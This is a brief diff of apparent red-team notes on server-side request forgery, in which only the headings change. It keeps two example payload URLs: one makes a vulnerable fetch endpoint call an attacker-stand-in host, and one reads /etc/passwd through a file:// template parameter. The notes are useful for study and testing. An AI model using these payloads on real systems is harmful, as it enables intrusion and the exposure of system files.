Server-Side Request Forgery (SSRF)

 Red Team Techniques (Offensive)

-1. Basic SSRF Attacks
+1. Basic SSRF (Server-Side Request Forgery)

 http://vulnerable.com/api/fetch?url=http://attacker.com

-File Protocol
+File Protocol (Local File Access)

 http://vulnerable.com/export?template=file:///etc/passwd